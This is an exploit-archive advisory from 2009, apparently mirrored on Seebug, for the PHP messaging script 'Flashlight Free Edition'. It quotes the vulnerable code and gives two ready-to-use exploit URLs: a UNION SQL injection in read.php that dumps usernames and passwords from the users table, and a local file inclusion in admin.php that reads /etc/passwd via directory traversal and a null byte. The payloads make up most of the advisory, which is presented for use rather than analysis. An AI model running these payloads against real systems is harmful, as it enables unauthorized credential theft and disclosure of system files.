XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX Flashlight Free Edition - (LFI/SQL) Multiple Remote Vul XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX RATM: "All hell can't stop us now!" XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX --[Author : k4m1k451 --[E-mail : k4m1k451@gmail.com XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX --[Script : Flashlight --[Download : http://scripts.ringsworld.com/communication-tools/flashlight-free-edition.zip XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX --[Remote SQLi --[File : read.php --[Vul : $id = $_GET['id']; $sql = mysql_query("SELECT * FROM inbox WHERE msg_id='$id' AND msg_to='$user_id'"); --[Exploit : http://localhost/flash/read.php?id=1'+UNION+ALL+SELECT+1,2,3,4,5,concat(username,0x20,password),version(),user(),9+from+users--+ XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX --[Local File Inclusion --[File : admin.php --[Vul : $inc = $_GET['action']; include ("admin/".$inc.".php"); --[Exploit : http://localhost/flash/admin.php?action=../../../../../../../../etc/passwd%00 XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX Gr3etz: c0d3_z3r0, 0ut0fBound, str0ke XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX # milw0rm.com [2009-06-02]
※本站提供的任何内容、代码与服务仅供学习,请勿用于非法用途,否则后果自负
您的会员可兑换次数还剩: 次 本次兑换将消耗 1 次
续费请拨打客服热线,感谢您一直支持 Seebug!
京公网安备 11010502034610号
暂无评论